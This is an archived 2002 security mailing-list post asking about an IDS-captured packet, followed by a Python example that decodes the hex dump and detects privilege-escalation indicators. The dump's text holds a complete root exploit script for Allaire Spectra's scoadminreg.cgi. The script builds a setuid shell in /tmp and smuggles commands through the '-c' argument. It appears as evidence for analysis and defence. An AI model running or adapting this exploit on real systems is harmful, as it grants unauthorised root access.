Attempted Exploit
From: Josh Lutz (jlutz@ESIENT.com) Date: 01/22/02
- Previous message: Mark Medici: "RE: win2k ports"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 22 Jan 2002 15:55:30 -0500 From: "Josh Lutz" <jlutz@ESIENT.com> To: <security-basics@securityfocus.com>
I was scanning through my IDS logs when I came across the packet below.
As far as I can tell (and I am very new to this), it is attempting to
execute a CGI script called "scoadminreg.cgi." I suspect, though I
cannot find any supporting documentation, that there is an exploit of
scoadminreg.cgi. I could only find references to scoadminreg relating to
the Allaire Spectra Webtop management app. After searching through the
archives, I found a notice from Allaire about a cross-site scripting
vulnerability <http://www.securityfocus.com/advisories/2090>. Is this
what I am looking at?
I know it attempts to compile scoadminreg.cgi as /temp/jggm, run jggm,
then remove the contents of the /tmp directory. I am not sure why it
would be attempting to compile scoadminreg.
I'd appreciate any feedback.
Thanks,
Josh
01/22-08:38:42.189324 xx.yy.151.26:44559 -> xxx.xxx.xxx.xxx:25
TCP TTL:51 TOS:0x0 ID:42681 IpLen:20 DgmLen:1297 DF
***AP*** Seq: 0xE3DE6905 Ack: 0xD94DD903 Win: 0x16D0 TcpLen: 20
74 20 61 64 64 20 6F 62 6A 65 63 74 20 20 28 29 t add object ()
0D 0D 0A 52 45 53 55 4C 54 3A 20 45 72 72 6F 72 ...RESULT: Error
3A 20 4F 62 6A 65 63 74 20 22 2E 2E 2E 2F 5F 65 : Object ".../_e
6E 73 2F 4F 72 67 22 20 61 6C 72 65 61 64 79 20 ns/Org" already
65 78 69 73 74 73 2E 0D 0D 0A 4C 6F 63 61 74 69 exists....Locati
6F 6E 3A 20 2F 77 65 62 74 6F 70 2F 77 65 62 74 on: /webtop/webt
6F 70 73 2F 65 6E 5F 55 53 2F 61 64 6D 69 6E 2F ops/en_US/admin/
73 63 6F 61 64 6D 69 6E 72 65 0D 0D 0A 67 45 72 scoadminre...gEr
72 6F 72 2E 68 74 6D 6C 0D 0D 0A 0D 0D 0A 53 75 ror.html......Su
63 63 65 73 73 2E 2E 2E 0D 0D 0A 23 20 69 64 0D ccess......# id.
0D 0A 75 69 64 3D 31 30 31 28 6D 65 61 72 65 65 ..uid=101(mearee
29 20 67 69 64 3D 31 28 6F 74 68 65 72 29 20 65 ) gid=1(other) e
75 69 64 3D 30 28 72 6F 6F 74 29 0D 0D 0A 23 20 uid=0(root)...#
0D 0D 0A 0D 0D 0A 49 74 20 63 61 6E 20 72 65 6D ......It can rem
6F 74 65 20 61 74 74 61 63 6B 2E 2E 2E 6D 61 79 ote attack...may
62 65 2E 2E 2E 20 3A 29 29 0D 0D 0A 0D 0D 0A 2D be... :))......-
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0D --------------..
0A 4B 6F 72 65 61 6E 20 53 65 63 75 72 69 74 79 .Korean Security
20 46 6F 72 75 6D 2E 0D 0D 0A 68 74 74 70 3A 2F Forum....http:/
2F 77 77 77 2E 66 6F 72 73 65 63 75 72 65 2E 63 /www.forsecure.c
6F 6D 0D 0D 0A 68 74 74 70 3A 2F 2F 77 77 77 2E om...http://www.
6E 65 74 65 6D 70 65 72 6F 72 2E 63 6F 6D 0D 0D netemperor.com..
0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D .---------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
0D 0D 0A 0D 0D 0A 48 65 72 65 20 69 73 20 66 69 ......Here is fi
6C 65 2E 2E 2E 0D 0D 0A 0D 0D 0A 2D 2D 2D 2D 2D le.........-----
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0D 0A 23 21 2F 62 ---------...#!/b
69 6E 2F 73 68 0D 0D 0A 0D 0D 0A 43 43 3D 22 67 in/sh......CC="g
63 63 22 0D 0D 0A 53 43 4F 41 44 4D 49 4E 3D 2F cc"...SCOADMIN=/
6F 70 74 2F 77 65 62 74 6F 70 2F 62 69 6E 2F 69 opt/webtop/bin/i
33 75 6E 30 32 31 32 2F 63 67 69 2D 0D 0D 0A 62 3un0212/cgi-...b
69 6E 2F 61 64 6D 69 6E 2F 73 63 6F 61 64 6D 69 in/admin/scoadmi
6E 72 65 67 2E 63 67 69 0D 0D 0A 0D 0D 0A 23 0D nreg.cgi......#.
0D 0A 23 0D 0D 0A 23 0D 0D 0A 23 0D 0D 0A 0D 0D ..#...#...#.....
0A 65 63 68 6F 0D 0D 0A 65 63 68 6F 20 22 6A 47 .echo...echo "jG
67 4D 20 72 6F 6F 74 20 65 78 70 6C 6F 69 74 22 gM root exploit"
0D 0D 0A 65 63 68 6F 20 22 68 74 74 70 3A 2F 2F ...echo "http://
77 77 77 2E 6E 65 74 65 6D 70 65 72 6F 72 2E 63 www.netemperor.c
6F 6D 2F 22 0D 0D 0A 65 63 68 6F 0D 0D 0A 65 63 om/"...echo...ec
68 6F 20 22 4D 61 69 6C 3A 20 6A 67 67 6D 40 6D ho "Mail: jggm@m
61 69 6C 2E 63 6F 6D 22 0D 0D 0A 65 63 68 6F 0D ail.com"...echo.
0D 0A 0D 0D 0A 69 66 20 5B 20 21 20 2D 78 20 24 .....if [ ! -x $
53 43 4F 41 44 4D 49 4E 20 5D 3B 20 74 68 65 6E SCOADMIN ]; then
0D 0D 0A 20 20 20 65 63 68 6F 20 22 24 53 43 4F ... echo "$SCO
41 44 4D 49 4E 20 66 69 6C 65 20 6E 6F 74 20 66 ADMIN file not f
6F 75 6E 64 22 0D 0D 0A 20 20 20 65 78 69 74 20 ound"... exit
32 3B 0D 0D 0A 66 69 0D 0D 0A 0D 0D 0A 63 61 74 2;...fi......cat
20 3E 2F 74 6D 70 2F 6A 67 67 6D 2E 63 20 3C 3C >/tmp/jggm.c <<
5F 45 4F 46 0D 0D 0A 0D 0D 0A 6D 61 69 6E 28 29 _EOF......main()
0D 0D 0A 7B 0D 0D 0A 20 20 20 73 65 74 75 69 64 ...{... setuid
28 30 29 3B 0D 0D 0A 20 20 20 73 65 74 67 69 64 (0);... setgid
28 30 29 3B 0D 0D 0A 20 20 20 63 68 6F 77 6E 28 (0);... chown(
22 2F 74 6D 70 2F 6A 47 67 4D 5F 53 68 65 6C 6C "/tmp/jGgM_Shell
22 2C 20 30 2C 20 30 29 3B 0D 0D 0A 20 20 20 63 ", 0, 0);... c
68 6D 6F 64 28 22 2F 74 6D 70 2F 6A 47 67 4D 5F hmod("/tmp/jGgM_
53 68 65 6C 6C 22 2C 20 30 34 37 35 35 29 3B 0D Shell", 04755);.
0D 0A 7D 0D 0D 0A 5F 45 4F 46 0D 0D 0A 0D 0D 0A ..}..._EOF......
63 70 20 2F 62 69 6E 2F 6B 73 68 20 2F 74 6D 70 cp /bin/ksh /tmp
2F 6A 47 67 4D 5F 53 68 65 6C 6C 0D 0D 0A 24 43 /jGgM_Shell...$C
43 20 2D 6F 20 2F 74 6D 70 2F 6A 67 67 6D 20 2F C -o /tmp/jggm /
74 6D 70 2F 6A 67 67 6D 2E 63 0D 0D 0A 0D 0D 0A tmp/jggm.c......
24 53 43 4F 41 44 4D 49 4E 20 22 2D 63 20 2F 74 $SCOADMIN "-c /t
6D 70 2F 6A 67 67 6D 3B 2F 74 6D 70 2F 6A 67 67 mp/jggm;/tmp/jgg
6D 3B 22 0D 0D 0A 0D 0D 0A 72 6D 20 2D 72 66 20 m;"......rm -rf
2F 74 6D 70 2F 6A 67 67 6D 20 2F 74 6D 70 2F 6A /tmp/jggm /tmp/j
67 67 6D 2E 63 0D 0D 0A 0D 0D 0A 2F 74 6D 70 2F ggm.c....../tmp/
6A 47 67 4D 5F 53 68 65 6C 6C 0D 0D 0A 0D 0D 0A jGgM_Shell......
23 20 65 6E 64 20 6F 66 20 66 69 6C 65 2E 2E 0D # end of file...
0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ..--------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ----------------
2D 2D 2D 0D 0D 0A 2E 0D 0A ---......
---------------------------------------------
Joshua Lutz
Network Engineer, ESI Enterprises, Inc.
1188 Centre Street
Newton Centre MA 02459
p. 617.527.4343 x107
f. 617.527.3303
e. jlutz@esient.com
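The hex dump above is hard to read column by column, and the question in the post ("what am I looking at?") is really answered by recovering the plain text of the payload. The following script is an added example written for this archive page; it is not code from the post or from any product it mentions. It parses Snort-style "hex hex hex ... ascii" dump lines back into bytes, normalises the doubled line endings (0D 0D 0A) the capture contains, and then checks the recovered text against a short list of indicators a defender would care about: a root `euid` in command output, an embedded `#!/bin/sh` script, `setuid(0)`/`setgid(0)` calls in dropped C source, and a `chmod` that sets the setuid bit on a file under `/tmp`. The sample input is three short excerpts copied from the dump in the post (the `id` output and two pieces of the dropped script); they are not adjacent in the original packet, so the decoded text simply concatenates them. The parser stops at the first non-hex token on a line, so a short final line whose ASCII column happens to begin with two hex-looking characters would be misread; full 16-byte lines are safe because only the first 16 tokens are consumed.

```python
import re
from typing import List

# Excerpts from the Snort hex dump quoted in the post above. Each line is
# up to 16 hex bytes followed by the printable-ASCII rendering of those bytes.
SAMPLE_DUMP = """\
63 63 65 73 73 2E 2E 2E 0D 0D 0A 23 20 69 64 0D ccess......# id.
0D 0A 75 69 64 3D 31 30 31 28 6D 65 61 72 65 65 ..uid=101(mearee
29 20 67 69 64 3D 31 28 6F 74 68 65 72 29 20 65 ) gid=1(other) e
75 69 64 3D 30 28 72 6F 6F 74 29 0D 0D 0A 23 20 uid=0(root)...#
2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0D 0A 23 21 2F 62 ---------...#!/b
69 6E 2F 73 68 0D 0D 0A 0D 0D 0A 43 43 3D 22 67 in/sh......CC="g
63 63 22 0D 0D 0A 53 43 4F 41 44 4D 49 4E 3D 2F cc"...SCOADMIN=/
0D 0D 0A 7B 0D 0D 0A 20 20 20 73 65 74 75 69 64 ...{... setuid
28 30 29 3B 0D 0D 0A 20 20 20 73 65 74 67 69 64 (0);... setgid
28 30 29 3B 0D 0D 0A 20 20 20 63 68 6F 77 6E 28 (0);... chown(
22 2F 74 6D 70 2F 6A 47 67 4D 5F 53 68 65 6C 6C "/tmp/jGgM_Shell
22 2C 20 30 2C 20 30 29 3B 0D 0D 0A 20 20 20 63 ", 0, 0);... c
68 6D 6F 64 28 22 2F 74 6D 70 2F 6A 47 67 4D 5F hmod("/tmp/jGgM_
53 68 65 6C 6C 22 2C 20 30 34 37 35 35 29 3B 0D Shell", 04755);.
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def dump_to_bytes(dump: str, width: int = 16) -> bytes:
    """Turn 'hh hh hh ... ascii' dump lines back into the raw payload bytes.

    Only the first `width` tokens of a line are considered, and parsing stops
    at the first token that is not exactly two hex digits, which is where the
    ASCII column begins on a short (final) line.
    """
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:width]:
            if not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def payload_text(dump: str) -> str:
    """Decode the payload as text and collapse CR CR LF / CR LF to LF."""
    raw = dump_to_bytes(dump)
    text = raw.decode("latin-1")  # one character per byte, nothing is dropped
    return text.replace("\r\r\n", "\n").replace("\r\n", "\n")


# Indicators of a successful privilege escalation / dropped root shell.
# Labels and patterns are this example's own choices, not an IDS signature set.
INDICATORS = [
    ("command output reports euid=0 (root)", re.compile(r"\beuid=0\(root\)")),
    ("embedded Bourne shell script", re.compile(r"^#!/bin/(?:ba)?sh", re.M)),
    ("setuid(0)/setgid(0) in dropped C source", re.compile(r"\bset[ug]id\(0\)")),
    ("setuid bit set on a /tmp binary", re.compile(r'chmod\("/tmp/[^"]+",\s*0?4755\)')),
]


def find_indicators(text: str) -> List[str]:
    """Return the labels of every indicator whose pattern occurs in `text`."""
    return [label for label, pat in INDICATORS if pat.search(text)]


if __name__ == "__main__":
    text = payload_text(SAMPLE_DUMP)
    print(text)
    for hit in find_indicators(text):
        print("-", hit)
```

Run as a script it prints the recovered text of the excerpts and then the four indicator labels. Reading the decoded payload this way also resolves the question in the post: the `# id` output shows `euid=0(root)`, so the capture is not a cross-site scripting probe but the transcript of a local root shell being obtained through the `scoadminreg.cgi` binary, with the script that did it appended for reference.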